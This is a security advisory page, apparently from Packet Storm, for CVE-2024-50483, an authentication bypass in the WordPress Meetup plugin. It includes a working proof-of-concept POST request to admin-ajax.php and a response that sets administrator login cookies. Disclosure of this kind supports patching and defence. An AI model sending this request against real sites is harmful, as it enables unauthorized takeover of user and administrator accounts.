WordPress Meetup 0.1 Authentication Bypass ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

# CVE-2024-50483
Meetup <= 0.1 - Authentication Bypass via Account Takeover
# Description:
The Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.
```
CVE: CVE-2024-50483
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: meetup
```
Note: You need to know the users email address you want to login as.
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
action=meetup_fb_register&email=Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/
```
Response
--
```
HTTP/1.1 200 OK
Date: Tue, 05 Nov 2024 21:37:23 GMT
Server: Apache/2.4.57 (Debian)
X-Powered-By: PHP/8.2.13
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly
Content-Length: 0
Content-Type: text/html; charset=UTF-8
```

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (933)
• Advisory^[20] (87,455)
• Arbitrary^[21] (17,185)
• BBS^[22] (2,859)
• Bypass^[23] (1,936)
• CGI^[24] (1,049)
• Code Execution^[25] (7,977)
• Conference^[26] (693)
• Cracker^[27] (845)
• CSRF^[28] (3,440)
• DoS^[29] (25,442)
• Encryption^[30] (2,397)
• Exploit^[31] (54,488)
• File Inclusion^[32] (4,280)
• File Upload^[33] (1,028)
• Firewall^[34] (822)
• Info Disclosure^[35] (2,939)
• Intrusion Detection^[36] (923)
• Java^[37] (3,166)
• JavaScript^[38] (911)
• Kernel^[39] (7,357)
• Local^[40] (14,892)
• Magazine^[41] (587)
• Overflow^[42] (13,272)
• Perl^[43] (1,435)
• PHP^[44] (5,331)
• Proof of Concept^[45] (2,421)
• Protocol^[46] (3,760)
• Python^[47] (1,675)
• Remote^[48] (31,985)
• Root^[49] (3,677)
• Rootkit^[50] (531)
• Ruby^[51] (645)
• Scanner^[52] (1,662)
• Security Tool^[53] (8,068)
• Shell^[54] (3,326)
• Shellcode^[55] (1,219)
• Sniffer^[56] (905)
• Spoof^[57] (2,312)
• SQL Injection^[58] (16,752)
• TCP^[59] (2,465)
• Trojan^[60] (690)
• UDP^[61] (921)
• Virus^[62] (675)
• Vulnerability^[63] (33,258)
• Web^[64] (10,176)
• Whitepaper^[65] (3,786)
• x86^[66] (970)
• XSS^[67] (18,344)
• Other^[68]

File Archives

• November 2024^[69]
• October 2024^[70]
• September 2024^[71]
• August 2024^[72]
• July 2024^[73]
• June 2024^[74]
• May 2024^[75]
• April 2024^[76]
• March 2024^[77]
• February 2024^[78]
• January 2024^[79]
• December 2023^[80]
• Older^[81]

Systems

• AIX^[82] (430)
• Apple^[83] (2,126)
• BSD^[84] (378)
• CentOS^[85] (61)
• Cisco^[86] (1,954)
• Debian^[87] (7,155)
• Fedora^[88] (1,693)
• FreeBSD^[89] (1,247)
• Gentoo^[90] (4,604)
• HPUX^[91] (881)
• iOS^[92] (393)
• iPhone^[93] (108)
• IRIX^[94] (220)
• Juniper^[95] (71)
• Linux^[96] (51,818)
• Mac OS X^[97] (696)
• Mandriva^[98] (3,105)
• NetBSD^[99] (256)
• OpenBSD^[100] (490)
• RedHat^[101] (17,238)
• Slackware^[102] (941)
• Solaris^[103] (1,615)
• SUSE^[104] (1,444)
• Ubuntu^[105] (9,968)
• UNIX^[106] (9,474)
• UnixWare^[107] (188)
• Windows^[108] (6,784)
• Other^[109]

© 2024 Packet Storm. All rights reserved.